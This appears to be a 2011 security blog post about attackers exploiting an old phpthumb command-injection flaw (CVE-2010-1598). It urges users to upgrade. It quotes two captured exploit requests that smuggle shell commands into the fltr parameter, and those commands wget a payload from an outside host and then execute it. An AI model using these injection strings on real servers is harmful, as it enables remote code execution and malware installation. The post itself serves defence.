22 December 2011

New attempts to exploit old phpthumb vulnerabilities

After several weeks of heavy scanning for awstats vulnerabilities that reminded us of the importance of patching followed by some scanners trying to exploit phpAlbum vulnerabilities, we now have seen thousands of attempts to exploit a phpthumb vulnerability first reported by Secunia in April 2010 as CVE-2010-1598.   (Hey, give these guys some credit… they started out using the awstats vulnerability that was first discovered in 2006… maybe we should we call this progress?)

The vulnerability text states that it is applicable to phpthumb version <= 1.7.9.  The current version is 1.7.11 and is available for download here. If you are using phpthumb, upgrade to the latest version to avoid becoming a victim.  

The requests I have seen are typically as follows:  

GET /admin/phpthumb/phpthumb.php?fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; & src=file.jpg & phpThumbDebug=9

GET /lib/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; & phpThumbDebug=9  

IPs seen today were as follows:

91.121.61.223
202.131.87.70